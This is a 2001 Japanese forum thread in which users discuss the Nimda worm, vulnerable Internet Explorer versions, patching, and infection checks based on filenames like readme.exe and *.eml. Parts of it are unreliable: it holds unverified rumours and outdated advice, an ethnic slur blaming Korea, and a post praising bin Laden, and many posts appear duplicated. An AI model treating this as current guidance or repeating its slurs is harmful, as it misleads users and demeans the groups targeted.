警告が出てアップデート画面に逝けなかった。
危なそうだから切ってるのになぁ。これじゃ対策できないよ。
アクティブXを許可するようセキュリティレベルを変更しろという
警告が出てアップデート画面に逝けなかった。
危なそうだから切ってるのになぁ。これじゃ対策できないよ。
104 : :01/09/19 10:42 ID:bi15wNtM
5.50.4134〜〜なんだけどSP1とか2っていうのは
どこを見ればわかるのでしょうか?
教えてください。
どこを見ればわかるのでしょうか?
教えてください。
105 : :01/09/19 10:42 ID:WBf583Ys
これは、みんなのアドレスを回収してるんだろ。
米軍の作戦に強力しろよ。
米軍の作戦に強力しろよ。
106 :質問:01/09/19 10:43 ID:zI4sYv0Y
PC初心者だからなにがおこっているのか、
どう対策したらいいのかわからない。
ウィルスバスターはいれてある。
IE5.0 SP2
って書いてあります。これで大丈夫なんですか?
感染するとどうなるんですか?
あとマイクロソフトのソフト更新ページ行こうとすると
なにかダウンロードする状態になるのですが、まさかマイクロソフトページ
がハッキンぐされてないでしょうね?
どう対策したらいいのかわからない。
ウィルスバスターはいれてある。
IE5.0 SP2
って書いてあります。これで大丈夫なんですか?
感染するとどうなるんですか?
あとマイクロソフトのソフト更新ページ行こうとすると
なにかダウンロードする状態になるのですが、まさかマイクロソフトページ
がハッキンぐされてないでしょうね?
107 : :01/09/19 10:43 ID:OtlH8lsE
>>101 NESCAPE ある意味ウィルスじゃん。
108 : :01/09/19 10:43 ID:qM9fx6jM
109 : :01/09/19 10:43 ID:CIjuhvgQ
110 : :01/09/19 10:44 ID:mxUXkeNs
111 : :01/09/19 10:44 ID:FuOd4MA6
オレ5.00で感染してないんだけど
112 : :01/09/19 10:45 ID:cd9RQlRQ
113 : :01/09/19 10:45 ID:LNEMDmj.
前スレの873ですが、なんとかSP2にUPDATEできたようです。
バージョン情報のところにSP2とあればいいんですよね?
前スレの875,876さん、ありがとうございました。
バージョン情報のところにSP2とあればいいんですよね?
前スレの875,876さん、ありがとうございました。
114 : :01/09/19 10:45 ID:3JZD3Vno
コード・レッド上回る感染力の新ウイルス、FBIが警告
米連邦捜査局(FBI)は18日、極めて感染力が強い新種のコンピューター・ウイルス
「W32NIMDA」が広まりつつあるとして注意を呼び掛けた。
7月にインターネットの情報の流れを滞らせ、ホワイトハウスのサーバーを攻撃した
「コード・レッド」よりも広範囲に被害をもたらす可能性があるという。
ウイルスは「Admin(政府)2(to)3W(War)」、つまり
「第三次世界大戦へ向かう政府」という意味のことばを逆に書いたような名称。
このため、先週の同時テロとの関係を指摘する声もあるが、
アシュクロフト司法長官は記者会見で、「ウイルス感染と同時テロとを結びつける証拠は
現時点では得ていない」と述べた。
ウイルスは昨日から電子メールの添付ファイルとともに急速に広がり出し、
サーバーやパソコンへの感染は数万件に達している模様だ。
「README.EXE」の名前が付いた電子メールのファイルを開いて感染した例が
報告されている。(ワシントン=安藤淳)
米連邦捜査局(FBI)は18日、極めて感染力が強い新種のコンピューター・ウイルス
「W32NIMDA」が広まりつつあるとして注意を呼び掛けた。
7月にインターネットの情報の流れを滞らせ、ホワイトハウスのサーバーを攻撃した
「コード・レッド」よりも広範囲に被害をもたらす可能性があるという。
ウイルスは「Admin(政府)2(to)3W(War)」、つまり
「第三次世界大戦へ向かう政府」という意味のことばを逆に書いたような名称。
このため、先週の同時テロとの関係を指摘する声もあるが、
アシュクロフト司法長官は記者会見で、「ウイルス感染と同時テロとを結びつける証拠は
現時点では得ていない」と述べた。
ウイルスは昨日から電子メールの添付ファイルとともに急速に広がり出し、
サーバーやパソコンへの感染は数万件に達している模様だ。
「README.EXE」の名前が付いた電子メールのファイルを開いて感染した例が
報告されている。(ワシントン=安藤淳)
115 : :01/09/19 10:45 ID:FFqQ1V3w
早速対策を…と思ったらインストール途中で必ず止まりやんの鬱
アンインストールも出来ないし前にも進めず後ろも戻れず
アンインストールも出来ないし前にも進めず後ろも戻れず
116 : :01/09/19 10:46 ID:NlvHTnzs
117 :k:01/09/19 10:47 ID:TPMz4Xgk
悪質ウイルスニムダは明らかにカンコック出身だ。
http://www.asahi.com/international/update/0919/004.html
http://www.asahi.com/international/update/0919/004.html
118 :.:01/09/19 10:47 ID:/fS/CQEE
ビンラディンまんせー
119 :ガシシ右松:01/09/19 10:48 ID:gBj1L9VM
5.5SP2なんですけど、
ダウンロード確認ダイアログ出たもんで
キャンセルしてすぐ切断。
ファイル見てみたらホントに出来てた・・・
readme.exeとreadme.eml !!
すぐ削除したけど、
それにしても感染速度のレコード塗り替えるんじゃないか?
ダウンロード確認ダイアログ出たもんで
キャンセルしてすぐ切断。
ファイル見てみたらホントに出来てた・・・
readme.exeとreadme.eml !!
すぐ削除したけど、
それにしても感染速度のレコード塗り替えるんじゃないか?
120 :Win厨房のあほのみなさん:01/09/19 10:48 ID:rUiXeQag
IE5.5SP2がダウンロードできない人は、近くのコンピュータ店にいって、
プロバイダが販促用に配ってるCDをもらってくるとよい。もちろん無料。
だいたいはIEの最新版が入ってるはず。場合によってはプロバイダ用に
カスタマイズ(トップページがmsnでない等)されてる場合もあるが、
とりあえずバージョンアップするには良いと思う。
プロバイダが販促用に配ってるCDをもらってくるとよい。もちろん無料。
だいたいはIEの最新版が入ってるはず。場合によってはプロバイダ用に
カスタマイズ(トップページがmsnでない等)されてる場合もあるが、
とりあえずバージョンアップするには良いと思う。
122 : :01/09/19 10:49 ID:1L5pANOU
>>104
更新バージョンという項目に、
sp1;XXXXXXXXX(数は重要じゃないからパス)
ってな風になっているならSP1(危険らしい)
sp2;xxxxxxxx
ならSP2(安全らしい)
どちらもなければノーマルバージョン(危険)
更新バージョンという項目に、
sp1;XXXXXXXXX(数は重要じゃないからパス)
ってな風になっているならSP1(危険らしい)
sp2;xxxxxxxx
ならSP2(安全らしい)
どちらもなければノーマルバージョン(危険)
124 :豆:01/09/19 10:50 ID:K7bK1LgQ
アドレス帳に誰のアドレスも無いのですが(悲
それでも感染していた場合、他人迷惑かける事はあるでしょうか。
昨日、夕方以降はmsnにはアクセスしていませんです。
それでも感染していた場合、他人迷惑かける事はあるでしょうか。
昨日、夕方以降はmsnにはアクセスしていませんです。
125 : :01/09/19 10:50 ID:mxUXkeNs
http://www.microsoft.com/downloads/release.asp?ReleaseID=32351
ちょっとMSたいむりーに出しすぎだよ
IE5.5 SP2じゃなくて こっちがちゃんと出たから こっちをいれたほうが良い
ちょっとMSたいむりーに出しすぎだよ
IE5.5 SP2じゃなくて こっちがちゃんと出たから こっちをいれたほうが良い
126 : :01/09/19 10:51 ID:lX8DO7fQ
どんなスクリプトだったらウィルスなんですか?
前スレの1以外に変化したりするんですか?
前スレの1以外に変化したりするんですか?
127 :名無しさん:01/09/19 10:51 ID:xd.89Pkw
つーか、これを機にMozilla 0.94入れとけ。
だいぶ軽くなってるぞ。
http://www.mozilla.org/releases/
http://ftp.mozilla.org/pub/mozilla/releases/mozilla0.9.4/mozilla-win32-0.9.4-installer.exe
だいぶ軽くなってるぞ。
http://www.mozilla.org/releases/
http://ftp.mozilla.org/pub/mozilla/releases/mozilla0.9.4/mozilla-win32-0.9.4-installer.exe
128 :Mozillaユーザー:01/09/19 10:51 ID:vNG41wMc
∧_∧ / ̄ ̄ ̄ ̄ ̄
( ´_ゝ`)< ふーん
( ) \_____
| | |
(__)_)
( ´_ゝ`)< ふーん
( ) \_____
| | |
(__)_)
129 : :01/09/19 10:51 ID:usJFfbdQ
あーくそめっちゃむかつく!!!!!
絶対感染しとるわ!!!!!!
絶対感染しとるわ!!!!!!
130 : :01/09/19 10:51 ID:CIjuhvgQ
131 : :01/09/19 10:52 ID:p0HcAdmo
なんかすごそうだがよくわからない
簡潔に言うとIE5.5 SP2をウィンドウズアップデート行って入れればいいわけ?
簡潔に言うとIE5.5 SP2をウィンドウズアップデート行って入れればいいわけ?
133 : :01/09/19 10:53 ID:1L5pANOU
げ、既に感染している手遅れがwinアップデートにウイルス撒いてしまった
らしいってICQ来たけど、マジ?
らしいってICQ来たけど、マジ?
134 : :01/09/19 10:53 ID:qSOu2Upo
135 :(゚д゚):01/09/19 10:54 ID:9EWYmhQQ
検索したらemlファイルが2個・・・
場所はメール関連・・・
最後にメーラー起動したのはNYテロ以前・・・・
結構前から発生してたかも。
場所はメール関連・・・
最後にメーラー起動したのはNYテロ以前・・・・
結構前から発生してたかも。
136 :ななし:01/09/19 10:54 ID:gTujLaVg
今メールチェックしたら
自分のやってるMLあてに「MAILER DAEMON@mama.〜」なるメールが来てて、
WEBメールで添付ファイル開いたらダウンロードページが出てきました
会員以外からのメールだったんでみんなに配布される前に削除したんですが
これってやっぱやばいでしょうか?
自分のやってるMLあてに「MAILER DAEMON@mama.〜」なるメールが来てて、
WEBメールで添付ファイル開いたらダウンロードページが出てきました
会員以外からのメールだったんでみんなに配布される前に削除したんですが
これってやっぱやばいでしょうか?
137 : :01/09/19 10:54 ID:p0HcAdmo
138 : :01/09/19 10:53 ID:ruuRkgsY
これって予告かな?
---------------------------------------------
https://www.netsecurity.ne.jp/article/9/2839.html
クラッキング警報(未確認)(2001.9.17)
改竄、事件情報を扱うwebサイトEVERYDAY PEOPLEに 中国から 9月18日に、
大規模な攻撃があるとの未確認情報が掲載された。
攻撃対象となっているwebサイトのIPアドレス一覧も掲載されている。
---------------------------------------------
https://www.netsecurity.ne.jp/article/9/2839.html
クラッキング警報(未確認)(2001.9.17)
改竄、事件情報を扱うwebサイトEVERYDAY PEOPLEに 中国から 9月18日に、
大規模な攻撃があるとの未確認情報が掲載された。
攻撃対象となっているwebサイトのIPアドレス一覧も掲載されている。
139 :名無し:01/09/19 10:54 ID:r9Obg67M
PC再起動できなくて、あぼーんなんて事に。
140 : :01/09/19 10:54 ID:75TmM8/w
みんなウィルスにかかって馬鹿だね〜
彼女でも作りな!
俺なんてかわいこちゃんとメールごっこしてるよ〜
花火の出るメールおくって貰ってもうラブラブ!
向こうもHAPPY1999っていうから幸せそうだよ!
彼女でも作りな!
俺なんてかわいこちゃんとメールごっこしてるよ〜
花火の出るメールおくって貰ってもうラブラブ!
向こうもHAPPY1999っていうから幸せそうだよ!
141 : :01/09/19 10:55 ID:cd9RQlRQ
142 :名無しさん:01/09/19 10:55 ID:t5ePDc5w
144 :ナナシサン:01/09/19 10:55 ID:ETHVTTR2
>133
最高の展開になるかもしれませんね(w
最高の展開になるかもしれませんね(w
145 : :01/09/19 10:55 ID:lX8DO7fQ
おいらマカで今日ヒマだから
感染サイト探してきたいんだけど
手がかりをください。
感染サイト探してきたいんだけど
手がかりをください。
146 : :01/09/19 10:56 ID:r.Jpc6gY
OCNつながんないんだけどなんか関係あるのかな。
常時接続がつながらないから非常に困る。
つーか、初心者の俺は的外れなこと言ってるかも。
常時接続がつながらないから非常に困る。
つーか、初心者の俺は的外れなこと言ってるかも。
147 : :01/09/19 10:56 ID:NlvHTnzs
148 : :01/09/19 10:56 ID:p0HcAdmo
149 :ナナシサソ:01/09/19 10:57 ID:uy8Pfu/w
150 : :01/09/19 10:57 ID:cd9RQlRQ
とりあえず感染サイト一覧キボーーーン
151 : :01/09/19 10:57 ID:H/4ljnnI
IE6入れてもいいの?
152 :ナナシサソ:01/09/19 10:58 ID:uy8Pfu/w
>>150
ほい。
http://keisui.com/GIGAZINE/cgi-bin/news/html/lg/000319.htm
元は
http://headlines.yahoo.co.jp/hl?a=20010919-00000002-vgb-sci
ほい。
http://keisui.com/GIGAZINE/cgi-bin/news/html/lg/000319.htm
元は
http://headlines.yahoo.co.jp/hl?a=20010919-00000002-vgb-sci
153 : :01/09/19 10:58 ID:7id9qeMg
IE6だから関係ねーや
154 : :01/09/19 10:59 ID:qSOu2Upo
155 : :01/09/19 10:59 ID:9N7NeOAQ
IE6はIE6でセキュリティーホールありそうだから5.5sp2のままにしてるんやけどなぁ。
156 :シコ踏み:01/09/19 10:59 ID:qasMGDqo
、、、前スレが、玉三郎なんですが(藁
157 : :01/09/19 10:59 ID:CIjuhvgQ
158 : :01/09/19 10:59 ID:KkiM3mB2
ts
159 : :01/09/19 11:00 ID:rUiXeQag
Windows厨房のみなさん。
それでもIEをつかいつづけますか?
あほですな。あははは
それでもIEをつかいつづけますか?
あほですな。あははは
160 : :01/09/19 11:01 ID:cd9RQlRQ
161 : :01/09/19 11:01 ID:qSOu2Upo
つーか、普通にアップデートしときゃ平気なものなんだが。
162 :名無しさん:01/09/19 11:01 ID:t5ePDc5w
>>147
こんなん書いてあるから・・・俺、詳しくないし・・・
http://www.microsoft.com/products/windows/ie_intl/ja/download/preview/ie6/ie6preview.htm
重要 このソフトウェアはリリース前の製品 (Beta 版) で、製品へのフィードバックおよびテスト目的のために
提供されます。弊社では、Beta 版の製品に対する技術サポートは行っていません。ピア ツー ピア ニュースグ
ループへのアクセス方法については、下記を参照してください。このソフトウェアは、リリース前のソフトウェア
のテストを普段から行っているユーザーを対象としています。この条件にあてはまるかどうか定かでない場合は、
このソフトウェアをダウンロードしないことをお勧めします。このソフトウェアをインストールする場合は、
テスト環境を用意し、日常の業務に使っている環境にはインストールしないことをお勧めします。
こんなん書いてあるから・・・俺、詳しくないし・・・
http://www.microsoft.com/products/windows/ie_intl/ja/download/preview/ie6/ie6preview.htm
重要 このソフトウェアはリリース前の製品 (Beta 版) で、製品へのフィードバックおよびテスト目的のために
提供されます。弊社では、Beta 版の製品に対する技術サポートは行っていません。ピア ツー ピア ニュースグ
ループへのアクセス方法については、下記を参照してください。このソフトウェアは、リリース前のソフトウェア
のテストを普段から行っているユーザーを対象としています。この条件にあてはまるかどうか定かでない場合は、
このソフトウェアをダウンロードしないことをお勧めします。このソフトウェアをインストールする場合は、
テスト環境を用意し、日常の業務に使っている環境にはインストールしないことをお勧めします。
163 :104:01/09/19 11:01 ID:bi15wNtM
ノーマルバージョンでした。
危険だ。。。
助言ありがとございます>くれた方
感染してるかどうか調べてみます。
危険だ。。。
助言ありがとございます>くれた方
感染してるかどうか調べてみます。
164 : :01/09/19 11:01 ID:qM9fx6jM
165 : :01/09/19 11:01 ID:FbuD5hAI
>88
ぜんぜん
ぜんぜん
166 : :01/09/19 11:03 ID:NlvHTnzs
167 : :01/09/19 11:03 ID:KbV6D4iw
初心者はBeta版のIE6.0は入れないほうがいいと思われ!!
メモリオーバーになっても対処できなければ違う意味で
すすめれない。
メモリオーバーになっても対処できなければ違う意味で
すすめれない。
168 : :01/09/19 11:03 ID:1L5pANOU
とりあえず加速度的に感染サイトは増えるはずだから、状況がよくわからん人は
インターネットオプションのセキュリティからレベルカスタマイズで
javascriptはずしとき〜
インターネットオプションのセキュリティからレベルカスタマイズで
javascriptはずしとき〜
169 : :01/09/19 11:05 ID:n5wmWdo2
バージョン情報で更新バージョンが0って事はメチャメチャ危険てこと!!!?
170 :ぷ:01/09/19 11:05 ID:VwgsGDI2
PC業界も景気が落ち込んでいる中で、セキュリティ関係は景気がうなぎのぼりらしい
ですからねえ。
不景気な世の中でそれを持続させるためにも、ウィルスだのワームだのが必要悪だと
思ったりする輩もいるんだと思いますよ。
ですからねえ。
不景気な世の中でそれを持続させるためにも、ウィルスだのワームだのが必要悪だと
思ったりする輩もいるんだと思いますよ。
171 : :01/09/19 11:05 ID:XDNpbKcY
JavaScript切るだけでは不十分だと。
172 :名無しさん:01/09/19 11:06 ID:t5ePDc5w
173 : :01/09/19 11:06 ID:n9gK8NgM
ここ1週間はメール来てない(涙
174 :104:01/09/19 11:06 ID:bi15wNtM
自分が感染してるかわからないのですが・・
175 : :01/09/19 11:06 ID:qSOu2Upo
とりあえず、これで暫くの間ネット重くなったりするんだろなー
やだな。
やだな。
177 : :01/09/19 11:07 ID:usJFfbdQ
おわびとしてXPを無料配布しろ!!ヽ(`Д´)ノ
178 :104:01/09/19 11:08 ID:bi15wNtM
179 : :01/09/19 11:08 ID:1L5pANOU
>>169
つうか、今回のウイルスに限らず、セキュリティの脆弱さから改善を重ねた物が
SP2だから、いろんな意味で危ないぞ……。
今ネットでアップデートするのは危険だから、まだ感染してなければ
CDROM付きPC雑誌買ってきて、早急に5.5SP2か6.0正式版入れたほうがいい
つうか、今回のウイルスに限らず、セキュリティの脆弱さから改善を重ねた物が
SP2だから、いろんな意味で危ないぞ……。
今ネットでアップデートするのは危険だから、まだ感染してなければ
CDROM付きPC雑誌買ってきて、早急に5.5SP2か6.0正式版入れたほうがいい
180 :113:01/09/19 11:08 ID:LNEMDmj.
どなたか詳しい方、初心者でもわかるように、対象者や対処法などを
一度まとめてください。過去ログ見ろなんて言わないで・・・。
一度まとめてください。過去ログ見ろなんて言わないで・・・。
182 : :01/09/19 11:09 ID:f7q1PQcc
system.iniが
Shell= explorer.exe load.exe -dontrunold
となっていなければ感染していないと考えていいのかな?
Shell= explorer.exe load.exe -dontrunold
となっていなければ感染していないと考えていいのかな?
183 : :01/09/19 11:10 ID:cTIFc4g.
184 : :01/09/19 11:10 ID:qM9fx6jM
http://www.orico.co.jp/はいつ対処するんだろうか、せめてサーバとめれよ。
185 :169:01/09/19 11:10 ID:n5wmWdo2
バージョンにSP2はもちろんSP1すら付いてない!!
とりあえずjavaって項目を全てoffにしといたけど時既に遅し!!?
とりあえずjavaって項目を全てoffにしといたけど時既に遅し!!?
186 :104:01/09/19 11:11 ID:bi15wNtM
187 :169:01/09/19 11:11 ID:n5wmWdo2
188 : :01/09/19 11:12 ID:CIjuhvgQ
189 : :01/09/19 11:12 ID:6JeAotE2
昨日MSN逝ったら勝手になにかをDLしそうになったので
強制的に閉じましたが、今日PCを立ち上げると必ず
不正な処理が行なわれ〜が表示される。
エクスプローラーをDLしても
「前回の更新が終了してません。」と出てアプデート
できない。どうしろと?
強制的に閉じましたが、今日PCを立ち上げると必ず
不正な処理が行なわれ〜が表示される。
エクスプローラーをDLしても
「前回の更新が終了してません。」と出てアプデート
できない。どうしろと?
190 : :01/09/19 11:13 ID:NlvHTnzs
191 : :01/09/19 11:13 ID:OT3XX0.2
ネスケのスタッフがワーム配ってたりしてね
>>185
昨日夜から今日の朝にかけてmsnを見ていたら引っかかってる可能性が大きい。
ウイルスチェックのソフトウエアが入っていれば最新のパターンファイルにして、
かつ全ファイル(感染する可能性のあるファイルだけじゃダメ)のウイルスチェック
をするとよい。Norton Antivirusなら検出できるから。
もしソフトウエアを購入すらしてない場合は、あきらめてフォーマットしてから
OSごと再インストールするか、そうでなければウイルスチェックのソフトウエアを
購入せよ。
昨日夜から今日の朝にかけてmsnを見ていたら引っかかってる可能性が大きい。
ウイルスチェックのソフトウエアが入っていれば最新のパターンファイルにして、
かつ全ファイル(感染する可能性のあるファイルだけじゃダメ)のウイルスチェック
をするとよい。Norton Antivirusなら検出できるから。
もしソフトウエアを購入すらしてない場合は、あきらめてフォーマットしてから
OSごと再インストールするか、そうでなければウイルスチェックのソフトウエアを
購入せよ。
193 : :01/09/19 11:13 ID:CN87eRgs
これを機に久しぶりにパソコン雑誌買おうと思うんだけど
PC Japanでいいかな?
PC Japanでいいかな?
194 : :01/09/19 11:13 ID:yNH4JnFA
とりあえずプロクシオミトロンのnimbakillerをいれておいたが
心配だからSP2にもしておこうかな。
心配だからSP2にもしておこうかな。
195 : :01/09/19 11:13 ID:qSOu2Upo
>>180
対象者は、IE5.01、5.5のSP1以前。SP2にすれば大丈夫。
あと、ここのここのスレの報告によると5.0もアウトらしい。
もし、更新する前に巡回したいなら、JavaScriptはオフにしておけばいい。
対象となるバージョンのブラウザでは、ダイアログも表示されずにファイルがダウンロード、実行される。
対象外のブラウザではダイアログでるから、ダウンロードしない、ダウンロードしても実行しない。
簡単に言えば、アップデートすれってこと。
対象者は、IE5.01、5.5のSP1以前。SP2にすれば大丈夫。
あと、ここのここのスレの報告によると5.0もアウトらしい。
もし、更新する前に巡回したいなら、JavaScriptはオフにしておけばいい。
対象となるバージョンのブラウザでは、ダイアログも表示されずにファイルがダウンロード、実行される。
対象外のブラウザではダイアログでるから、ダウンロードしない、ダウンロードしても実行しない。
簡単に言えば、アップデートすれってこと。
196 :うちだけ?:01/09/19 11:14 ID:cd9RQlRQ
197 :質問:01/09/19 11:14 ID:2xMpMAT6
msn隔離しようとしたら、つないでしまいました。
メール到着1件の案内だけだったけど
平気なのかな。こわい。
メール到着1件の案内だけだったけど
平気なのかな。こわい。
198 : :01/09/19 11:14 ID:H/4ljnnI
*.eml 何もでてこない よかった。
199 :169:01/09/19 11:14 ID:n5wmWdo2
200 : :01/09/19 11:15 ID:r1PBvHkQ
漏れの環境は5.00.3315.1000&SP2だけど感染しなかったよ。
202 : :01/09/19 11:15 ID:RFnWYkPI
*.emlを検索しても見つからなかったのですが、
他に感染してるか確かめる方法ってないんですか?
他に感染してるか確かめる方法ってないんですか?
203 :ガシシ右松:01/09/19 11:15 ID:edUaqhG2
204 : :01/09/19 11:15 ID:qSOu2Upo
205 : :01/09/19 11:16 ID:TH3yhgJE
なんか80番叩いてくるヤツを逆に叩き返すとお約束のようにIISが居て、そのうち
半分は例のhtmlがひっついてるよ。こりゃ未曾有の事態だな。
半分は例のhtmlがひっついてるよ。こりゃ未曾有の事態だな。
206 : :01/09/19 11:16 ID:FuOd4MA6
readme.exe MEP51B3.TMP.EXE を削除するだけじゃダメなん?
207 : :01/09/19 11:16 ID:muRQhq5k
ノートンの更新リストに載ってますよね?
208 :169:01/09/19 11:17 ID:n5wmWdo2
209 : :01/09/19 11:16 ID:Fp8Ge/fo
オレIE6だった・・ヨカタヨ
210 : :01/09/19 11:17 ID:XDNpbKcY
>180
ファイルのダウンロードも無効にしたほがいいと思われ。
ファイルのダウンロードも無効にしたほがいいと思われ。
211 :ナナシサソ:01/09/19 11:17 ID:uy8Pfu/w
漏れは、関係ないの?
213 :104:01/09/19 11:17 ID:bi15wNtM
214 :質問:01/09/19 11:18 ID:2xMpMAT6
エラー画面とかでなきゃ、平気なのでしょうか。
検索かけたけど、*.emlはみつからず。
検索かけたけど、*.emlはみつからず。
215 :ガシシ右松:01/09/19 11:18 ID:edUaqhG2
216 :IE5.01sp2だけどやはしコワーイ:01/09/19 11:19 ID:CN87eRgs
ActiveX,JavaScript,Java,Javaアプレット,ファイルのダウソオフでいいんかな?
*.emlっての出てこなかった!
まだ感染されてないけど今から対策しないと・・・
まだ感染されてないけど今から対策しないと・・・
>>213
君はOutlook Expressを通常のメーラーとして使っているな?
だとしたら何はともあれウイルスチェックせよ。
>>212
今回は林檎の奴は無関係。
「ネットワークが重い」という二次的被害はあるかもしれないが。
君はOutlook Expressを通常のメーラーとして使っているな?
だとしたら何はともあれウイルスチェックせよ。
>>212
今回は林檎の奴は無関係。
「ネットワークが重い」という二次的被害はあるかもしれないが。
219 : :01/09/19 11:19 ID:qq6rhHg6
desktop.emlってファイルが600個近く・・・
220 : :01/09/19 11:19 ID:r.RMappI
221 : :01/09/19 11:19 ID:FbuD5hAI
セキュリティレベルを高にすれば安全でしょ??
222 :¥:01/09/19 11:20 ID:lwMqEV8k
SP2
入れたと思うんですけどどうやって確認すればよいのでしょうか?
どなたか教えていただけますか?お願いします。
入れたと思うんですけどどうやって確認すればよいのでしょうか?
どなたか教えていただけますか?お願いします。
223 :104:01/09/19 11:20 ID:bi15wNtM
224 :質問:01/09/19 11:20 ID:2xMpMAT6
メッセンジャーからは感染しないってことなのかしら?<msn
225 : :01/09/19 11:20 ID:obr1SLpY
このスレはじめてみたけど、ようはSP2をダウンロードするなということなんでしょうか?
227 : :01/09/19 11:20 ID:CIjuhvgQ
>>213は感染してるね・・・・
229 : :01/09/19 11:20 ID:7tfTt.Mw
>>189
うちも同じ
まだ再起動してないけど、、、、
感染してるサイト行ったら
ファイルのダウンロード画面出て、その直後
エクスプローラーが落ちた
んでSP2落として実行しても前回のセットアップが完了
してないから再起動しろって出るよ。
Win2000でIE5.01 SP1
うちも同じ
まだ再起動してないけど、、、、
感染してるサイト行ったら
ファイルのダウンロード画面出て、その直後
エクスプローラーが落ちた
んでSP2落として実行しても前回のセットアップが完了
してないから再起動しろって出るよ。
Win2000でIE5.01 SP1
230 : :01/09/19 11:20 ID:bKtwUKkM
231 : :01/09/19 11:21 ID:qSOu2Upo
232 : :01/09/19 11:21 ID:1L5pANOU
>>206
ウイルスには他のファイルなどを変質させて複製を潜伏させる物が多い(つうかほとんど)から
実行されたらそれを消しただけで復帰と言うことはまずないと思われる。
実行していないなら早急に削除してなかったことにするとよろし
ウイルスには他のファイルなどを変質させて複製を潜伏させる物が多い(つうかほとんど)から
実行されたらそれを消しただけで復帰と言うことはまずないと思われる。
実行していないなら早急に削除してなかったことにするとよろし
233 : :01/09/19 11:22 ID:OIgogmyI
234 : :01/09/19 11:22 ID:cd9RQlRQ
アホ >>225
235 : :01/09/19 11:22 ID:dEiwDa16
readme.emlの中身を適当なアプリに替えて
別マシンのIEで表示したら自動的に起動したよ。
それどころか左側のプレビューに表示された時点で実行された。コワイコワイ。
別マシンのIEで表示したら自動的に起動したよ。
それどころか左側のプレビューに表示された時点で実行された。コワイコワイ。
236 :質問:01/09/19 11:23 ID:2xMpMAT6
239 : :01/09/19 11:23 ID:oEnvj8ik
タリバンすげえ。マジ凄いよ
240 :219:01/09/19 11:24 ID:qq6rhHg6
消したけどまだ不安・・・他にやることってあるのかな。
241 : :01/09/19 11:24 ID:bD0/QBps
1MSNにいかない
身に覚えがないのファイルは
「実行しますか?」ときかれても「いいえ」クリックする。
(これで最悪の事態は間一発で回避できた。)
インターネットエクスプローラ5.5サービスパック2をインストール。
身に覚えがないのファイルは
「実行しますか?」ときかれても「いいえ」クリックする。
(これで最悪の事態は間一発で回避できた。)
インターネットエクスプローラ5.5サービスパック2をインストール。
242 :104:01/09/19 11:25 ID:bi15wNtM
これってタリバンなのかなー。
243 : :01/09/19 11:25 ID:1L5pANOU
244 : :01/09/19 11:25 ID:XDNpbKcY
245 : :01/09/19 11:26 ID:OIgogmyI
わりと最近MSN逝ったんだけどうちのは大丈夫だったらしい。
ワカンタンカの恵みあれ。
246 : :01/09/19 11:26 ID:mxUXkeNs
247 :NIMDAの確認方法:01/09/19 11:27 ID:W68xhoi.
スタートメニュー→検索→ファイルやフォルダを選び、
名前の項目に以下を一行ずつ入力して検索してみる。
*.eml
readme.exe
MEP51B3.TMP.EXE
これで感染の有無がとりあえず判断できる。
名前の項目に以下を一行ずつ入力して検索してみる。
*.eml
readme.exe
MEP51B3.TMP.EXE
これで感染の有無がとりあえず判断できる。
248 : :01/09/19 11:27 ID:cd9RQlRQ
けっこうマトモなスレだな
249 :対応方法:01/09/19 11:28 ID:byucTCuc
***クライアント側の対処***
ブラウザ 対処方法
1.IE5.0 IE5.01SP2以上へのアップデート
2.IE5.01,IE5.5 SP2の導入またはIE6.0の導入
上記作業は http://windowsupdate.microsoft.com/?IE で行う。
共通
3.ウィルスチェックソフトのパターンファイル更新
(NortonAntivirus2001で9/19にパターン更新すれば発見可能)
***サーバ側の対処***
1. MS社のセキュリティパッチ導入
http://www.microsoft.com/japan/technet/security/prekb.asp?sec_cd=MS00-078
2.ウィルスチェックソフトのパターンファイル更新
***最低限の常識***
1.見知らぬファイルのダウンロードや実行は行わない
参考情報
symantec社 http://www.symantec.com/region/jp/sarcj/data/w/[email protected]
MS社 http://www.microsoft.com/japan/technet/security/prekb.asp?sec_cd=MS00-078
ブラウザ 対処方法
1.IE5.0 IE5.01SP2以上へのアップデート
2.IE5.01,IE5.5 SP2の導入またはIE6.0の導入
上記作業は http://windowsupdate.microsoft.com/?IE で行う。
共通
3.ウィルスチェックソフトのパターンファイル更新
(NortonAntivirus2001で9/19にパターン更新すれば発見可能)
***サーバ側の対処***
1. MS社のセキュリティパッチ導入
http://www.microsoft.com/japan/technet/security/prekb.asp?sec_cd=MS00-078
2.ウィルスチェックソフトのパターンファイル更新
***最低限の常識***
1.見知らぬファイルのダウンロードや実行は行わない
参考情報
symantec社 http://www.symantec.com/region/jp/sarcj/data/w/[email protected]
MS社 http://www.microsoft.com/japan/technet/security/prekb.asp?sec_cd=MS00-078
251 :229:01/09/19 11:28 ID:7tfTt.Mw
IE 5.01 SP1で
*.emi や readme.exe
は検索で出てこなかったんですけど
感染したサイトにいった直後エクスプローラーが落ちました
SP2を実行しても前回のセットアップが完了していない
と言われてアップデート出来ないです。
これは感染してるんでしょうか?
*.emi や readme.exe
は検索で出てこなかったんですけど
感染したサイトにいった直後エクスプローラーが落ちました
SP2を実行しても前回のセットアップが完了していない
と言われてアップデート出来ないです。
これは感染してるんでしょうか?
252 : :01/09/19 11:28 ID:r7ysho2g
ネスケでよかったよ・・・
253 : :01/09/19 11:29 ID:1L5pANOU
254 : :01/09/19 11:29 ID:CIjuhvgQ
255 : :01/09/19 11:30 ID:w88symTc
*.emlで検索したら、このスレのログが出てきた(苦笑)
256 :IE5.01sp2だけどコワーイ:01/09/19 11:30 ID:CN87eRgs
>>221
いやー一応目でも各項目を確認しといたほうが安心しない?
セキュリティ高で各項目がどう設定されてるかなんて一々覚えてないし。
なんかセキュリティのレベルを書き換えちゃうウィルスとかもあったし・・
>>243
たぶん未感染なので大丈夫かな。普段スクリプトオフだし。たぶん。ありがとお。
いやー一応目でも各項目を確認しといたほうが安心しない?
セキュリティ高で各項目がどう設定されてるかなんて一々覚えてないし。
なんかセキュリティのレベルを書き換えちゃうウィルスとかもあったし・・
>>243
たぶん未感染なので大丈夫かな。普段スクリプトオフだし。たぶん。ありがとお。
257 : :01/09/19 11:30 ID:XDNpbKcY
258 :113:01/09/19 11:30 ID:LNEMDmj.
260 : :01/09/19 11:30 ID:NlvHTnzs
261 : :01/09/19 11:31 ID:ZftG5Ghw
バージョンは、、、5.0とある
じゃ大丈夫なんだろうか
じゃ大丈夫なんだろうか
262 : :01/09/19 11:31 ID:KpYJi8SA
ウイルスバスターで大丈夫?
今朝、アップデートしたばかりなんだけど・・・
今朝、アップデートしたばかりなんだけど・・・
>>251
